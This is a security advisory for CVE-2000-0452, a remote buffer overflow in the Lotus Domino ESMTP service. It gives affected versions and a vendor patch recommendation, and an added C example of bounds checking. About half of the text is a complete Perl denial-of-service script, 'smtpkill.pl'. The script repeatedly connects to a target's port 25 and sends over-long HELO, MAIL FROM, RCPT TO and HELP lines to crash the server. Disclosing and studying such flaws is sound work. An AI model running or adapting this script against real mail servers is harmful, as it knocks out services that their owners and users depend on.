Lotus Domino Server ESMTP Remote Buffer Overflow Vulnerability
Published: 2000-03-18
Updated: 2000-03-18
Affected systems:
Lotus Domino Enterprise Server 5.0.3
Lotus Domino Enterprise Server 5.0.2
Lotus Domino Mail Server 5.0.3
Lotus Domino Mail Server 5.0.2
Lotus Domino Mail Server 5.0.1
Lotus Domino Enterprise Server 5.0.1
- HP HP-UX 11.04
- IBM AIX 4.3.2
- Linux kernel 2.2
- Microsoft Windows NT 4.0
- Sun Solaris 7.0
Description:
BUGTRAQ ID: 1229
CVE(CAN) ID: CVE-2000-0452
Lotus Domino Server is a web-based collaboration application platform that runs on Linux/Unix and Microsoft Windows operating systems.
The ESMTP service of the Lotus Domino server contains a buffer overflow vulnerability that a remote attacker may be able to exploit to carry out a denial-of-service attack.
The ESMTP service of the Lotus Domino server lacks buffer bounds checking when it processes the 'rcpt to', 'saml from' and 'soml from' commands. If the Lotus Domino server receives any one of these three commands with an argument longer than 4 KB, the system crashes, and service resumes only after a restart.
<*Source: Michal Zalewski (lcamtuf@dione.ids.pl)
Links: http://marc.theaimsgroup.com/?l=bugtraq&m=95877957401631&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=96869172909708&w=2
*>
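The missing check described above, written out as an added example (not Lotus code and not part of the original advisory): an SMTP command handler that rejects an over-long line before any parsing or copying takes place. The function name `smtp_check_path_command`, the inclusion of MAIL FROM, and the sample input are assumptions; the limits are the 512-octet command line and 256-octet path from RFC 5321 section 4.5.3.1.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* RFC 5321 section 4.5.3.1: command line <= 512 octets incl. CRLF, path <= 256. */
#define SMTP_MAX_LINE 512
#define SMTP_MAX_PATH 256

/* The three verbs named in the advisory, plus MAIL FROM (added here). */
static const char *const PATH_VERBS[] = {
    "RCPT TO:", "SAML FROM:", "SOML FROM:", "MAIL FROM:"
};

/* Case-insensitive prefix match that never reads past len. */
static int has_verb(const char *line, size_t len, const char *verb, size_t vlen)
{
    if (len < vlen) return 0;
    for (size_t i = 0; i < vlen; i++)
        if (toupper((unsigned char)line[i]) != verb[i]) return 0;
    return 1;
}

/* Hypothetical helper: validate one received line of len bytes.
 * Returns 250 and copies the path into out, 500 for an over-long line,
 * 501 for an empty or over-long path, 0 for any other command. */
int smtp_check_path_command(const char *line, size_t len, char *out, size_t out_sz)
{
    if (len > SMTP_MAX_LINE) return 500;   /* reject before parsing or copying */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n')) len--;
    for (size_t v = 0; v < sizeof PATH_VERBS / sizeof PATH_VERBS[0]; v++) {
        size_t vlen = strlen(PATH_VERBS[v]);
        if (!has_verb(line, len, PATH_VERBS[v], vlen)) continue;
        const char *arg = line + vlen;
        size_t alen = len - vlen;
        while (alen > 0 && *arg == ' ') { arg++; alen--; }
        if (alen == 0 || alen > SMTP_MAX_PATH || alen >= out_sz) return 501;
        memcpy(out, arg, alen);            /* alen < out_sz is guaranteed here */
        out[alen] = '\0';
        return 250;
    }
    return 0;
}

int main(void)
{
    char path[SMTP_MAX_PATH + 1];
    const char line[] = "rcpt to: <user@example.com>\r\n";  /* constructed sample */
    printf("%d\n", smtp_check_path_command(line, strlen(line), path, sizeof path));
    return 0;
}
```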
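Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!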
#!/usr/bin/perl
# Need net::telnet to run
# Expl0it By smiler@vxd.org
# Tested with sucess against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0
# and probably many others that I hadnt chance to explore.
# I wrote this after Michal Zalewski brought this issue in BugTraq.
# Cheers 351 and FractalG :)
use Net::Telnet;
print "SmtpKILL By smiler\@vxd.org\n";
if (not $ARGV[1]) {
print qq~
Usage : smtpkill.pl <type> <host>
<type> Type of attack :
type 1 = long mail from: someone\@4k_of_junk
type 2 = long rcpt to: someone\@4k_of_junk
type 3 = long helo longdomain_with_4k_of_junk
type 4 = long undefined command (4k_of_junk)
type 5 = long help 4k_of_junk
type 6 = long mail from: and mail to:
<host> Host that you want to DOS, Ip or Domain will be ok.
Example Usage : smtpkill.pl 5 127.0.0.1
~; exit;}
$type=$ARGV[0];
$target=$ARGV[1];
print "TYPE ATTACK: $type\n";
print "TARGET : $target\n";
for ($i=4096;$i<5096;$i++)
{
$obj=Net::Telnet->new( Host => "$target",Port => 25);
if ($type=~ "1") {
$helo="helo ptrulez";
$from="mail from: v0v0@". 'ptrulez' x $i;
$rcpt="rcpt to: v0v0\@v0v0.pt";
}
if ($type=~ "2") {
$helo="helo ptrulez";
$from="mail from: v0v0\@v0v0.pt";
$rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
}
if ($type=~ "3") {
$helo="helo ". 'ptrulez' x $i;
$from="mail from: v0v0\@v0v0.pt";
$rcpt="rcpt to: v0v0\@v0v0.pt";
}
if ($type=~ "4") {
$helo="havesomefun". 'ptrulez' x $i;
}
if ($type=~ "5") {
$helo="help ". 'ptrulez' x $i;
}
if ($type=~ "6") {
$helo="helo ptrulez";
$from="mail from: ". 'ptrulez' x $i;
$rcpt="rcpt to: ". 'ptrulez' x $i;
}
print "$helo\n";$obj->print("$helo");
print "$from\n";$obj->print("$from");
print "$rcpt\n";$obj->print("$rcpt");
$obj->close;
}
Recommendation:
Vendor patch:
Lotus
-----
The vendor has released an upgrade patch that fixes this security issue; upgrade to Lotus Domino 5.0.5 or later:
http://www.lotus.com/